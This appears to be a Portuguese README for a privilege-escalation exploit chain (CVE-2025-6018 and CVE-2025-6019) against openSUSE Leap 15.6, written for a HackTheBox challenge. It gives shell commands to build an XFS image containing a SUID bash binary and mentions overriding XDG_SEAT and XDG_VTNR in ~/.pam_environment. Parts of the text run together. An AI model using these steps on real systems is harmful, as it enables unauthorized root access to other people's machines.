
Cadeia de exploração de escalonamento de privilégios (CVE-2025-6018 + CVE-2025-6019) para openSUSE Leap 15.6
Este exploit foi desenvolvido para resolver um desafio HackTheBox visando openSUSE Leap 15.6.
Este exploit é baseado na pesquisa original da Equipe de Segurança da Qualys:
Implementação de referência adicional:
Este exploit encadeia duas vulnerabilidades para obter escalonamento de privilégio local de um usuário não privilegiado para root no openSUSE Leap 15.6:
O exploit requer uma imagem de sistema de arquivos XFS pré-criada contendo um binário bash SUID. Isso deve ser criado em uma máquina Linux onde você tenha privilégios de root:
dd if=/dev/zero of=xfs.image bs=1M count=400
mkfs.xfs xfs.image
mkdir -p /tmp/mnt
mount xfs.image /tmp/mnt
cp /bin/bash /tmp/mnt/bash
chmod 04755 /tmp/mnt/bash
umount /tmp/mnt
Verifique se a imagem foi criada corretamente:
file xfs.image
# Should output: "SGI XFS filesystem data (blksz 4096, inosz 256, v2 dirs)"
~/.pam_environment com substituições de XDG_SEAT e XDG_VTNRSe o exploit falhar:
file xfs.imagesystemctl status udisks2Este exploit é apenas para fins educacionais e testes de segurança autorizados. Use com responsabilidade e apenas em sistemas que você tem permissão para testar.